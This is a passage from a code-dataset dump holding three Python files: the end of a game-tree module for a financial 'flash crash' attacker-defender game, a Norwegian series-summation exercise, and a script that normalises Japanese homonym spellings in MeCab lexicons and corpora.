copy_network(af_network)\n net2.submit_buy_orders(order_set)\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[BUY].append(str(order_set))\n self.children[str(order_set)] = PortfolioMarketMoveGameState(\n self,\n actions_manager,\n MARKET,\n PlayersHiddenInfo(players_info.attacker_attack, players_info.attacker_pid, players_info.defender - cost),\n net2,\n actions_history2\n )\n self._information_set = \".{0}.{1}\".format(players_info.defender, 'D_HISTORY:' + str(actions_history[BUY]))\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n def is_terminal(self):\n return False\n\n\n\n\n","sub_path":"games/flash_crash/flash_crash_players_portfolio_cfr.py","file_name":"flash_crash_players_portfolio_cfr.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
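Each game-state class in the record above computes `self.tree_size = 1 + sum(...)` after constructing its children, so subtree sizes propagate bottom-up as the tree is built eagerly. A stripped-down sketch of that bookkeeping in isolation; the `Node` class is an illustrative stand-in, not one of the record's game states:

```python
# Sketch: eager bottom-up tree-size accounting, as in the game states above.
class Node:
    def __init__(self, children=None):
        self.children = children or {}
        # children are fully built before the parent, so their sizes are final
        self.tree_size = 1 + sum(c.tree_size for c in self.children.values())

leaf_a, leaf_b = Node(), Node()
root = Node({"a": leaf_a, "b": Node({"c": leaf_b})})
assert root.tree_size == 4  # root + leaf_a + inner node + leaf_b
```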
+{"seq_id":"474586079","text":"\r\ndef a_sum():\r\n N = 5 #antall ledd\r\n summen = 0 #summen av 0 ledd\r\n for i in range(1,N):\r\n x_i = 1/i**2 #i-ende leddet\r\n summen = summen + x_i #summen med det i-ende leddet\r\n print(summen)\r\n\r\ndef b_sum():\r\n tol = 0.00000000000000001 #feiltoleranse\r\n x_i = 1 #nullte leddet\r\n i = 1 #ledd-teller\r\n summen = 1 #summen av 1 ledd \r\n while x_i - 1/(i+1)**2 > tol:\r\n x_i = 1/(i+1)**2\r\n summen = summen + x_i\r\n i += 1\r\n print(\"Summen er \",summen,\" og antall ledd er \", i)\r\n\r\na_sum()\r\n\r\nb_sum()\r\n","sub_path":"tdt4110/Øving 3/sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"541878902","text":"import os,sys,imp,time,romkan,copy,re,functools,itertools\nfrom collections import OrderedDict\nfrom collections import defaultdict\n#from mecabtools import mecabtools\n#imp.reload(mecabtools)\nfrom pythonlib_ys import main as myModule\nfrom pythonlib_ys import jp_morph\nimp.reload(myModule)\nHomeDir=os.getenv('HOME')\nmecabtools=imp.load_source('mecabtools',os.path.join(HomeDir,'myProjects/myPythonLibs/mecabtools/mecabtools.py'))\nimport mecabtools\nimp.reload(mecabtools)\nfrom probability import probability\nimp.reload(probability)\n\nDebug=1\n\ndef main0(LexFPs,MecabCorpusFPs,CorpusOnly=False,FreqWdFP=None,UnnormalisableMarkP=True,ProbExemplarFP=None,OutFP=None):\n LexDir=os.path.dirname(LexFPs[0])\n RelvFts=('cat','subcat','subcat2','sem','infform','infpat','pronunciation')\n ProbExemplars=get_exemplars(ProbExemplarFP) if ProbExemplarFP else None\n Frequents=collect_freq_wds(FreqWdFP,1000) if FreqWdFP else set()\n OutFPStem='--'.join([os.path.basename(LexFP) for LexFP in LexFPs])\n HClusters,_=myModule.ask_filenoexist_execute_pickle(OutFPStem+'.pickle',get_clustered_homs,([LexFPs,RelvFts],{'Frequents':Frequents,'ProbExemplars':ProbExemplars,'OutFP':OutFPStem+'.out'}))\n if Debug:\n print_clustered_homs(HClusters,OutFP=os.path.join(LexDir,'exemplarless_clusters.txt'))\n LexFPs=[] if CorpusOnly else LexFPs\n for MecabFile,CorpusOrDic in [(LexFP,'dic') for LexFP in LexFPs]+[(MecabCorpusFP,'corpus') for MecabCorpusFP in MecabCorpusFPs]:\n sys.stderr.write('\\n\\nNormalising a '+CorpusOrDic+' '+MecabFile+'\\n')\n time.sleep(2)\n FN=os.path.basename(MecabFile)\n NewFN=myModule.change_stem(FN,'.normed')\n NewDir=os.path.join(os.path.dirname(MecabFile),'normed')\n if not os.path.isdir(NewDir):\n os.makedirs(NewDir)\n if OutFP:\n OutFP=OutFP\n else:\n OutFP=os.path.join(NewDir,NewFN)\n normalise_mecabfile(MecabFile,RelvFts,HClusters,OutFP=OutFP,CorpusOrDic=CorpusOrDic,UnnormalisableMarkP=UnnormalisableMarkP)\n\n\ndef print_clustered_homs(ClusteredHs,OutFP=None):\n Out=open(OutFP,'wt') if OutFP else sys.stdout\n for ClusteredH in ClusteredHs:\n if Debug<2 and ClusteredH.exemplar is None:\n Out.write(ClusteredH.show_summary()+'\\n')\n if OutFP:\n Out.close()\n\ndef get_exemplars(ExemplarFP):\n WdsReprs={}\n with open(ExemplarFP) as FSr:\n for LiNe in FSr:\n if LiNe:\n KanaRepr=LiNe.strip().split()\n if len(KanaRepr)==2:\n Wd,Repr=KanaRepr[0],KanaRepr[1]\n WdsReprs[Wd]=Repr\n return WdsReprs\n\ndef upto_char(Str,Chars):\n Substr=''\n for Char in Str:\n if Char in Chars:\n break\n else:\n Substr+=Char\n return Substr\n\ndef normalise_mecabfile(FP,RelvFts,ClusteredHs,OutFP=None,RelvFtCnt=7,CorpusOrDic='corpus',KanaOnly=True,UnnormalisableMarkP=True):\n # outfp could be none, true or string\n if not OutFP:\n Out=sys.stdout\n else:\n if OutFP is True:\n TmpOutFP=FP+'.normed.tmp'\n else:\n TmpOutFP=OutFP+'.tmp'\n Out=open(TmpOutFP,'wt')\n\n AlreadyNormedCommonFtsVals=set()\n MSs,Consts=None,myModule.prepare_progressconsts(FP)\n FSr=open(FP)\n ClusteredHDic={tuple(ClusterH.cluster_on):ClusterH for ClusterH in ClusteredHs}\n for Cntr,LiNe in enumerate(FSr):\n if Cntr+1%1000==0:\n MSs=myModule.progress_counter(MSs,Cntr,Consts)\n if not LiNe.strip():\n continue\n if CorpusOrDic=='corpus' and LiNe=='EOS\\n':\n AsItIs=True\n elif KanaOnly and not myModule.all_of_chartypes_p(upto_char(LiNe,[',','\\t']),['hiragana','katakana','roman']):\n AsItIs=True\n else:\n CommonFtsVals=tuple(mecabtools.pick_feats_fromline(LiNe,RelvFts,CorpusOrDic=CorpusOrDic))\n if CorpusOrDic=='corpus' and 
len(CommonFtsVals)==2:\n sys.stderr.write('\\nnormalised automatically for '+ClusteredH.hiragana_rendering+'\\n')\n ToWrite=NormalisedWd.get_mecabline(CorpusOrDic=CorpusOrDic)+'\\n'\n if CorpusOrDic=='dic':\n AlreadyNormedCommonFtsVals.add(CommonFtsVals)\n else:\n if CorpusOrDic=='corpus' and UnnormalisableMarkP:\n ToWrite='\\nNot automatically normalisable:\\n'+LiNe+'\\n'.join([KanjiWd.orth for KanjiWd in ClusteredH.kanji_tops])+'\\n\\n'\n else:\n ToWrite=LiNe\n \n Out.write(ToWrite)\n \n FSr.close()\n if OutFP:\n Out.close()\n os.rename(TmpOutFP,OutFP)\n\ndef get_clustered_homs(LexFPs,*Args,**KWArgs):\n ClusteredH=[]\n for LexFP in LexFPs:\n if Debug:\n sys.stderr.write('\\n\\nfinding homonym clusters with the lexicon '+LexFP+'\\n\\n')\n ClusteredH.extend(get_clustered_homs_file(LexFP,*Args,**KWArgs))\n return ClusteredH\n \ndef get_clustered_homs_file(LexFP,RelvFts,Frequents=set(),ProbExemplars={},OutFP=None):\n RelvInds=mecabtools.fts2inds(RelvFts,CorpusOrDic='dic')\n if Debug:\n print('doing the raw clustering')\n FtLines={ Ft:Lines for (Ft,Lines) in mecabtools.cluster_samefeat_lines(LexFP,RelvInds).items() if len(Lines)>=2 and Ft[-1]!='*' }\n\n ClusteredHs=[]\n MSs,Consts=None,myModule.prepare_progressconsts(FtLines)\n for Cntr,(FtSet,Lines) in enumerate(FtLines.items()):\n if Debug and (Cntr+1)%100==0:\n MSs=myModule.progress_counter(MSs,Cntr,Consts)\n MWds=[ mecabtools.mecabline2mecabwd(Line,CorpusOrDic='dic') for Line in Lines ]\n if Frequents and not any(MWd.orth in Frequents for MWd in MWds):\n continue\n FtSetLabeled=list(zip(RelvFts,FtSet))\n myCHs=ClusteredHomonyms(MWds,FtSetLabeled)\n myCHs.set_exemplar(ProbExemplars)\n ClusteredHs.append(myCHs)\n return ClusteredHs\n\n \ndef collect_freq_wds(FreqWdFP,RankUpTo,HiraganaOnly=False):\n Wds=set()\n with open(FreqWdFP) as FSr:\n for Cntr,LiNe in enumerate(FSr):\n if Cntr==RankUpTo-1:\n break\n Wd=LiNe.strip().split()[-1]\n if HiraganaOnly:\n if myModule.all_of_chartypes_p(Wd,['hiragana']):\n Wds.add(Wd)\n else: \n Wds.add(Wd)\n return Wds\n \n \nclass ClusteredHomonyms:\n def __init__(self,MecabWds,ClusterOn):\n if self.homonymity_check(MecabWds):\n self.cluster_on=tuple(ClusterOn)\n self.hiragana_rendering=jp_morph.kana2kana(self.cluster_on[-1][1])\n self.cluster_str=','.join([Val for (_,Val) in ClusterOn ])\n (KanaC,KanjiCs)=self.cluster_homonyms(MecabWds)\n self.kana_cluster=KanaC\n self.kana_lemma='unknown' if not self.kana_cluster else self.kana_cluster[0].lemma\n self.kanji_clusters=KanjiCs\n self.kanji_tops=[KanjiC[0] for KanjiC in self.kanji_clusters]\n #self.interkanji_dist=InterkanjiDist\n ReprType,ReprWds=self.pick_representative()\n self.represent_wds=ReprWds\n self.represent_type=ReprType\n # exemplar is dynamically set with set_exemplar\n self.exemplar=None\n\n def special_kana_exemplar_p(self):\n # いる なる やる ある only for now\n Specials={'いる':{'infpat':'一段'},'なる':{'cat':'動詞'},'やる':{'cat':'動詞'},'ある':{'cat':'動詞'}}\n Bool=False\n if self.kana_lemma in Specials.keys():\n FtValPairs=Specials[self.kana_lemma]\n if all(self.represent_wds[0].__dict__[Ft]==Val for (Ft,Val) in FtValPairs.items()):\n Bool=True\n \n return Bool\n \n def set_exemplar(self,ProbExemplars):\n Normalisable=False;Exemplar=None\n if self.special_kana_exemplar_p():\n # special exceptions where you don't convert to kanji\n Exemplar=self.kana_cluster[0]\n elif not self.kanji_clusters:\n # kana only case\n Normalisable=True\n Exemplar=self.kana_cluster[0]\n elif len(self.kanji_clusters)==1:\n # nonambiguous kanji case\n Normalisable=True\n 
Exemplar=self.represent_wds[0]\n elif self.kana_lemma in ProbExemplars.keys():\n ExemplarWds= [Wd for Wd in myModule.flatten_list(self.kanji_clusters) if Wd.lemma in ProbExemplars.values()]\n if ExemplarWds:\n Normalisable=True\n Exemplar=ExemplarWds[0]\n \n self.exemplar=Exemplar\n return Normalisable\n \n def pick_representative(self,Criterion='rate'):\n if not (self.kana_cluster or self.kanji_clusters):\n sys.exit('something is wrong, no cluster content')\n else:\n# # this means only kanji clusteres are populated\n # if not self.kana_cluster:\n # return ('kanji',self.kanji_clusters[0][0])\n # #and this, only kana cluster exists\n # elif not self.kanji_clusters:\n # return ('kana',self.kana_cluster[0])\n # # the following two are when both exist, and then, it depens on the count\n # else:\n if Criterion=='count':\n if self.kana_cluster[0].count*0.6>self.kanji_clusters[0][0].count:\n return 'kana',self.kana_cluster[0]\n else:\n return 'kanji',self.kanji_clusters[0][0]\n else:\n if not self.kanji_clusters:\n return 'kana',[jp_morph.pick_highest_charrate(self.kana_cluster,['hiragana'])[0]]\n else:\n return 'kanji',[jp_morph.pick_highest_charrate(Cluster,['han'])[0] for Cluster in self.kanji_clusters]\n\n def homonymity_check(self,MecabWds):\n Bool=True; PrvPron=None\n for MecabWd in MecabWds:\n if PrvPron:\n if MecabWd.pronunciation!=PrvPron:\n Bool=False\n break\n PrvPron=MecabWd.pronunciation\n return Bool\n \n def cluster_homonyms(self,MecabWds,SortP=False):\n KanaCluster=[ Hom for Hom in MecabWds if myModule.all_of_chartypes_p(Hom.orth,['hiragana','katakana','roman']) ]\n if SortP:\n KanaCluster=sorted(KanaCluster,key=lambda x:x.count,reverse=True)\n\n KanjiClusters=[]\n for Cntr,Hom in enumerate(set(MecabWds)-set(KanaCluster)):\n if Cntr==0:\n KanjiClusters.append([Hom])\n else:\n for Cluster in KanjiClusters:\n if homonympair_identical_p(Cluster[-1],Hom):\n Cluster.append(Hom)\n break\n else:\n KanjiClusters.append([Hom])\n\n if SortP:\n # sorting, inside a kanji cluster\n KanjiClusters=[ sorted(Cluster,key=lambda x:x.count,reverse=True) for Cluster in KanjiClusters ]\n # sorting, between clusters\n if len(KanjiClusters)>=2:\n KanjiClusters=sorted( KanjiClusters, key=lambda x:x[0].count, reverse=True )\n# InterClusterDist=probability.DiscDist({ KanjiCluster[0]:KanjiCluster[0].count for KanjiCluster in KanjiClusters },Smooth=True)\n \n return KanaCluster,KanjiClusters\n #,InterClusterDist\n\n def order_clusters(self):\n if not self.kanji_clusters:\n OrderedReprs=[self.order_by_countscore(self.kana_cluster)]\n else:\n OrderedReprs=[]\n for KanjiC in self.kanji_clusters:\n OrderedReprs.append(self.order_by_countscore(self.kana_cluster.union(KanjiC)))\n self.ordered_clusters=sorted(OrderedReprs,key=lambda x: x[0].count, reverse=True)\n \n def order_by_countscore(self,OrgWds,RareKanjiScale=4):\n ApplyRKS=False\n Wds=copy.copy(OrgWds)\n RareKanjis= [Wd for Wd in Wds if Wd.count<5 and any(myModule.identify_chartype(Char)=='han' for Char in Wd.orth)]\n if RareKanjis:\n ApplyRKS=True\n WdsScores=[]\n for Wd in Wds:\n if ApplyRKS:\n if Wd in RareKanjis:\n WdsScores.append((Wd,(Wd.count+1)*RareKanjiScale))\n elif myModule.all_of_chartypes_p(Wd.orth,['hiragana','katakana']):\n WdsScores.append((Wd,Wd.count//RareKanjiScale))\n else:\n WdsScores.append((Wd,Wd.count))\n else:\n WdsScores.append((Wd,Wd.count))\n return [ Wd for (Wd,Score) in sorted(WdsScores,key=lambda x:x[1],reverse=True) ]\n\n def show_summary(self):\n get_wdcntstrs=lambda Cl: [ Wd.orth+' '+str(Wd.count) for Wd in Cl]\n Lines=[]\n 
Lines.append(self.hiragana_rendering)\n Lines.append(repr(self.cluster_on))\n Lines.append(repr([Wd.orth for Wd in self.represent_wds]))\n ExemplarStr='Exempar: '\n if self.exemplar:\n ExemplarStr+=self.exemplar.orth\n else:\n ExemplarStr+=' NONE'\n Lines.append(ExemplarStr)\n Lines.append('kana cluster: '+' '.join(get_wdcntstrs(self.kana_cluster)))\n KanjiClustersStr=''\n if self.kanji_clusters:\n for Cl in self.kanji_clusters:\n KanjiClustersStr+=' '.join(get_wdcntstrs(Cl))+' / '\n Lines.append('kanji clusters: '+KanjiClustersStr)\n #LineElsIKD=[]\n# if len(self.kanji_clusters)>=2:\n # for (Evt,Prob) in self.interkanji_dist.evtprob.items():\n # LineElsIKD.append(Evt.orth+str(Prob))\n #Lines.append('kanji-conversion ratio '+' '.join(LineElsIKD))\n return '\\n'.join(Lines)\n\ndef output_model_text(Homs,Out):\n FSw=open(Out,'wt')\n for Hom in Homs:\n try:\n ClusterStr=Hom.show_summary()\n except:\n Hom.show_summary()\n FSw.write(ClusterStr+'\\n\\n')\n \n FSw.close()\n\n\ndef main00(CorpusFPs,LexFP,FtNums,AdditionalLexs=[],OutputModelText=None, CorpusOnly=False,UsePrevClusteredHoms=None,Debug=0):\n \n if UsePrevClusteredHoms:\n PickleFP=UsePrevClusteredHoms\n else:\n PickleFP='_'.join(CorpusFPs)+'_'+os.path.basename(LexFP)+'.clusteredhoms.pickle'\n (ClusteredHoms,_)=myModule.ask_filenoexist_execute_pickle(PickleFP,create_clustered_homonyms,([CorpusFPs,LexFP,FtNums],{}))\n if OutputModelText:\n OutFP=PickleFP.replace('.pickle','.txt')\n output_model_text(ClusteredHoms,OutFP)\n \n print('\\nextracting items to normalise...')\n WdsRepls=extract_wds2normalise(ClusteredHoms)\n\n print('\\nnormalising corpora...')\n normalise_mecab(CorpusFPs,WdsRepls,'corpus',Debug=Debug)\n\n if not CorpusOnly:\n print('\\nnormalising main lexicon...')\n normalise_mecab([LexFP],WdsRepls,'lex')\n if AdditionalLexs:\n print('\\nnormalising other lexicons...')\n normalise_mecab(AdditionalLexs,WdsRepls,'simplelex')\n\n \ndef create_clustered_homonyms(CorpusFPs,LexFP,FtNums):\n print('\\nfirst we do the raw counts')\n ClusteredWds=count_variants(CorpusFPs)\n print('\\nnow we collect non-ocurring items from the lexicon')\n ClusteredWds=augment_withnulloccs(ClusteredWds,FtNums,LexFP)\n print('\\nnow we cluster homonyms')\n ClusteredHoms=normalise_clustered_wds(ClusteredWds)\n return ClusteredHoms\n\ndef normalise_mecab(Files, WdsRepls, LorC='corpus',Debug=0):\n for File in Files:\n print('normalising '+File)\n normalise_mecab_file(File,WdsRepls,LorC,Debug=Debug)\n\ndef normalise_mecab_file(InputFP,WdsRepls,LexOrCorpus,OutputDiff=True,Debug=0):\n\n def return_match_ifany(Line,LinesRepls,LexOrCorpus,Regex):\n if LexOrCorpus=='lex':\n LineForm=re.sub(Regex,'\\t',Line)\n elif LexOrCorpus=='simplelex':\n LineForm=Line.split('\\t')[0]\n else:\n LineForm=Line\n if LineForm in LinesRepls.keys():\n ToReturn=LinesRepls[LineForm]\n else:\n ToReturn=None\n return ToReturn\n\n LinesRepls={ Wd.get_mecabline():Repl for (Wd,Repl) in WdsRepls.items() }\n\n FSr=open(InputFP)\n FSw=open(InputFP+'.normed','wt')\n\n Regex=re.compile(r',([0-9]+,){3}')\n if Debug:\n TgtLines=set([Line for Line in LinesRepls.keys()])\n SrcLinesUpTo100k=set();AllP=False\n for i in range(100000):\n Next=FSr.readline()\n if not Next:\n AllP=True\n break\n else:\n SrcLinesUpTo100k.add(Next.strip())\n if LexOrCorpus=='lex':\n SrcLinesUpTo100k={re.sub(Regex,'\\t',Line) for Line in SrcLinesUpTo100k}\n Intersect=TgtLines.intersection(SrcLinesUpTo100k)\n \n FSr.seek(0)\n\n if not Intersect:\n if AllP:\n print('there is no match, no point processing')\n else:\n 
print('there is no match for the first 100k, probable that there is none')\n if OutputDiff:\n FSwDiff=open(InputFP+'.diff','wt')\n show_linediff=lambda LiNe1,LiNe2: LiNe1.strip()+'\\n'+LiNe2.strip()\n for Cntr,LiNe in enumerate(FSr):\n Alt=return_match_ifany(LiNe.strip(),LinesRepls,LexOrCorpus,Regex)\n if Alt:\n AmbP=False\n if LexOrCorpus=='corpus':\n if isinstance(Alt,mecabtools.MecabWdParse):\n Picked=Alt\n else:\n Picked=probability.rand_biased(Alt)\n AmbP=True\n NewLiNe=Picked.get_mecabline()+'\\n'\n\n if OutputDiff:\n if AmbP:\n FSwDiff.write('ambiguous case, competitors are: ')\n FSwDiff.write(repr([(Wd.orth,Prob) for (Wd,Prob) in Alt.evtprob.items()])+'\\n')\n FSwDiff.write(show_linediff(LiNe,NewLiNe)+'\\n\\n')\n\n FSw.write(NewLiNe)\n else:\n print('found')\n pass\n else:\n FSw.write(LiNe)\n if OutputDiff:\n FSwDiff.close()\n FSr.close();FSw.close()\n\n\ndef extract_wds2normalise(HomCs,Debug=0):\n Wds2Normalise={}\n for HomC in HomCs:\n # if the representative is all-kana, we render everything that representative\n if HomC.represent_type=='kana':\n # that means the targets are everything except the representative itself\n Wds2Change2Kana=HomC.kana_cluster[1:]+myModule.flatten_list(HomC.kanji_clusters)\n for Wd2Change2Kana in Wds2Change2Kana:\n Wds2Normalise[Wd2Change2Kana]=HomC.represent_wd\n # on the other hand if it includes kanji, we keep the top ranked element in each cluster\n elif HomC.represent_type=='kanji':\n for KanaWd in HomC.kana_cluster:\n IKD=HomC.interkanji_dist\n KanjiWd=(list(IKD.evtprob.keys())[0] if IKD.evtcount==1 else IKD)\n Wds2Normalise[KanaWd]=KanjiWd\n for KanjiC in HomC.kanji_clusters:\n for NonTopKanjiWd in KanjiC[1:]:\n Wds2Normalise[NonTopKanjiWd]=KanjiC[0]\n return Wds2Normalise\n\n\ndef pick_corefts(Fts):\n return tuple([(NumsFts[Num],Fts[Num]) for Num in CoreFtNums])\n \n\ndef count_variants(MecabCorpusFPs):\n CumCoreFtsCnts={}\n for FP in MecabCorpusFPs:\n CoreFtsCntsPerCorpus=mecabtools.count_words(FP)\n CumCoreFtsCnts=myModule.merge_countdics(CumCoreFtsCnts,CoreFtsCntsPerCorpus)\n \n ClusteredWdsCnts=wdscnts2clusteredcnts(CumCoreFtsCnts)\n return ClusteredWdsCnts\n\ndef wdscnts2clusteredcnts(WdsCnts):\n Clustered={}\n\n for (Wd,Fts),Cnt in WdsCnts.items():\n \n FtsDic={'orth':Wd}\n for Num in range(9):\n FtsDic[NumsFts[Num]]=Fts[Num]\n # here you make an wd obj\n MWd=mecabtools.MecabWdParse(**FtsDic)\n MWd.set_count(Cnt)\n RelvFts=pick_corefts(Fts)\n #tuple([ (NumsFts[Num],Fts[Num]) for Num in ClusterOn ])\n \n if RelvFts not in Clustered.keys():\n Clustered[RelvFts]={MWd}\n else:\n Clustered[RelvFts].add(MWd)\n ClusteredMoreThan1={ Header:Wds for Header,Wds in Clustered.items() if len(Wds)>=2 }\n return ClusteredMoreThan1\n\n\ndef wdcnt2wdfts(CoreFts,WdsCnts):\n WdFts=[]\n for (Wd,OtherFts) in WdsCnts:\n WdFts.append((Wd,CoreFts[:-1]+OtherFts+CoreFts[-1:]))\n return WdFts\n\ndef augment_withnulloccs(ClusteredWds,FtNums,LexFP):\n for Cntr,LexLiNe in enumerate(open(LexFP)):\n if not mecabtools.not_proper_jp_p(LexLiNe):\n WdFtPairInLex=mecabtools.line2wdfts(LexLiNe,'dic')\n Orth,FtsLex=WdFtPairInLex\n if len(FtsLex)!=9:\n sys.stderr.write('something wrong with Line: '+str(Cntr+1)+' '+LexLiNe)\n continue\n Fts={}\n Fts['orth']=Orth\n Fts.update([ (NumsFts[Cntr],Val) for (Cntr,Val) in enumerate(FtsLex) ])\n WdInLex=mecabtools.MecabWdParse(**Fts)\n WdInLex.lexpos=Cntr+1\n CoreFtsLexLine=tuple([(NumsFts[Column-1],FtsLex[Column-1]) for Column in FtNums])\n # check if the dic entry is in the cluster set\n if CoreFtsLexLine in ClusteredWds.keys():\n # if 
it is, check the whole entry exists in it by checking noncore features match\n Cluster=ClusteredWds[CoreFtsLexLine]\n Fnd=False\n for WdInCorpus in Cluster:\n if all(WdInCorpus.__dict__[NonCoreFt] == WdInLex.__dict__[NonCoreFt] for NonCoreFt in NonCoreFts):\n Fnd=True\n WdInCorpus.lexpos=Cntr+1\n break\n if not Fnd:\n WdInLex.count=0\n ClusteredWds[CoreFtsLexLine].add(WdInLex)\n \n return ClusteredWds\n\ndef sift_list_relv_irrelv(List,Conditions=[],CntrConditions=[]):\n Relvs = []; Irrelvs = []\n for Cntr,El in enumerate(List):\n if all(Condition(El) for Condition in Conditions) and all(CntrCondition(Cntr) for CntrCondition in CntrConditions):\n Relvs.append(El)\n else:\n Irrelvs.append(El)\n return tuple(Relvs),tuple(Irrelvs)\n \n\ndef normalise_clustered_wds(ClusteredWds,Exclude=(),Debug=0):\n FtsReprs=[]\n for CoreFts,Cluster in ClusteredWds.items():\n Cluster=list(Cluster)\n if len(Cluster)==1:\n\n sys.stderr.write('no ambiguity\\n')\n# sys.stdout.write(Lines[0]+'\\n')\n else:\n if Debug:\n sys.stderr.write('\\ncandidates')\n sys.stderr.write('\\n'+repr([Wd.orth for Wd in Cluster])+'\\n')\n\n MyHoms=ClusteredHomonyms(Cluster,CoreFts)\n if Debug:\n print(MyHoms.show_summary())\n FtsReprs.append(MyHoms)\n \n return FtsReprs\n\n\ndef reduce_infwds(LexemeClusters,Debug=0):\n #WdFts should be a pair, word and features\n NewLexCs=OrderedDict()\n for LexemeFts,Lines in LexemeClusters.items():\n if LexemeFts[0] in ('動詞','形容詞'):\n ReprLineEls=reduce_infwd(LexemeFts,Lines)\n NewLexCs[LexemeFts]=[','.join(ReprLineEls)]\n else:\n NewLexCs[LexemeFts]=Lines\n return NewLexCs\n\ndef reduce_infwd(LexemeFts,Lines):\n def change_last_char(Str):\n if Str[-1]=='う':\n return Str[:-1]+'w'\n elif Str[-1]=='え':\n return Str[:-1]\n else:\n return Str[:-1]+romkan.to_hepburn(Str[-1])[0]\n\n (PoS,SubCat,_,_,InfType,InfCat)=LexemeFts\n\n ReprLineEls=next(Line for Line in Lines if Line.split(',')[9]=='基本形').split(',')\n DanGyo=InfType.split('・')\n if DanGyo[0]=='五段':\n ReprLineEls=[ change_last_char(ReprLineEl) if Cntr==0 or Cntr>=10 else ReprLineEl for (Cntr,ReprLineEl) in enumerate(ReprLineEls) ]\n \n elif DanGyo[0]=='一段' or PoS=='形容詞':\n ReprLineEls=[ ReprLineEl[:-1] if Cntr==0 or Cntr>=10 else ReprLineEl for (Cntr,ReprLineEl) in enumerate(ReprLineEls) ]\n\n return ReprLineEls\n\n\ndef choose_from_homonyms(Homs): \n return Homs.pop(),Homs\n\n#### CORE STUFF #####\ndef homonympair_identical_p(Homonym1,Homonym2):\n # trivial case\n if Homonym1.orth==Homonym2.orth:\n Bool=True\n else:\n # default is true\n Bool=True\n # but don't accept kanji-only pairs as synonyms\n if all(myModule.all_of_chartypes_p(Homonym.orth,['han']) for Homonym in (Homonym1,Homonym2)):\n Bool=False\n # otherwise, we take all the kanjis from each and if one does not contain another, we say they're not synonyms\n Kanjis1={ Char for Char in Homonym1.orth if myModule.identify_type_char(Char)=='han'}\n Kanjis2={ Char for Char in Homonym2.orth if myModule.identify_type_char(Char)=='han'}\n if not (Kanjis1.issubset(Kanjis2) or Kanjis2.issubset(Kanjis1)):\n Bool=False\n #otherwise it's a synonym\n else:\n Bool=True\n \n return Bool\n\n\n\ndef cluster_possibly_ambiguous_p(Cluster):\n KanaTypes=['hiragana','katakana','roman']\n KanjiContained=[Wd for Wd in Cluster if not myModule.all_of_chartypes_p(Wd.orth,KanaTypes)]\n if Debug:\n print([Wd.orth for Wd in Cluster])\n #if theres no kanji, they're just the same\n if not KanjiContained:\n Bool= False\n else:\n Bool=any(not homonympair_identical_p(Wd1,Wd2) for (Wd1,Wd2) in 
itertools.combinations(Cluster,2))\n\n if Debug:\n DebugStr=('ambiguous' if Bool else 'unambiguous')\n print(DebugStr+'\\n')\n \n return Bool\n\n\n \ndef main():\n import argparse,glob\n\n APsr=argparse.ArgumentParser()\n APsr.add_argument('-l','--lexicon-dir',required=True)\n APsr.add_argument('mecab_corpus_dir')\n APsr.add_argument('--debug',type=int,default=0)\n APsr.add_argument('--previous-clusteredhoms',default=None)\n APsr.add_argument('--additional-lexs',nargs='+',default=[])\n #APsr.add_argument('--corpus-only',action='store_true')\n APsr.add_argument('--unnormalisable-unmark',action='store_true')\n APsr.add_argument('--output-text',action='store_true')\n APsr.add_argument('-f','--freq-word-fp')\n APsr.add_argument('-e','--exemplar-fp')\n \n Args=APsr.parse_args()\n\n FPSets=[]\n for Dir,Ext in ((Args.lexicon_dir,'csv'),(Args.mecab_corpus_dir,'mecab')):\n if not os.path.isdir(Dir):\n sys.exit('\\n\\nspecified dir does not exist: '+Dir+'\\n')\n else:\n FPs=glob.glob(os.path.join(Dir,'*.'+Ext))\n if not FPs:\n sys.exit('\\n\\nno right file in specified dir: '+Dir+'\\n')\n else:\n FPSets.append(FPs)\n \n # generally, the exemplar file should be in the lex dir, the frequency file in the corpusdir\n AssistFPs=[ (Type,AssistFP) for (Type,AssistFP) in (('freq_word_fp',Args.freq_word_fp),('exemplar_fp',Args.exemplar_fp)) if AssistFP ]\n for Type,AssistFP in AssistFPs:\n if '/' not in AssistFP:\n Dir=Args.mecab_corpus_dir if Type=='freq_word_fp' else Args.lexicon_dir\n FP=os.path.join(Dir,AssistFP)\n if os.path.isfile(FP):\n Args.__dict__[Type]=FP\n else:\n sys.exit('AssistFP '+FP+' does not exist')\n \n main0(FPSets[0],FPSets[1],FreqWdFP=Args.freq_word_fp,ProbExemplarFP=Args.exemplar_fp,UnnormalisableMarkP=not Args.unnormalisable_unmark)\n\n\n\n\nif __name__=='__main__':\n main()\n","sub_path":"normalise_jp_shared/normalise_mecab.py","file_name":"normalise_mecab.py","file_ext":"py","file_size_in_byte":28193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
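At its core, the record's `cluster_samefeat_lines`/`ClusteredHomonyms` pipeline groups dictionary entries that share the same pronunciation-plus-feature key and keeps only groups with two or more members. A minimal sketch of that grouping step, assuming plain `(orth, pos, pronunciation)` tuples rather than the record's `MecabWdParse` objects; `cluster_homonyms` here is an illustrative reimplementation, not the class method above:

```python
# Sketch: bucket entries by a shared feature key; only buckets with
# two or more members are homonym clusters worth normalising.
from collections import defaultdict

def cluster_homonyms(entries):
    clusters = defaultdict(list)
    for orth, pos, pron in entries:
        clusters[(pos, pron)].append(orth)
    return {key: wds for key, wds in clusters.items() if len(wds) >= 2}

print(cluster_homonyms([
    ("橋", "名詞", "ハシ"),   # bridge
    ("箸", "名詞", "ハシ"),   # chopsticks
    ("犬", "名詞", "イヌ"),   # dog: no homonym, filtered out
]))  # -> {('名詞', 'ハシ'): ['橋', '箸']}
```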
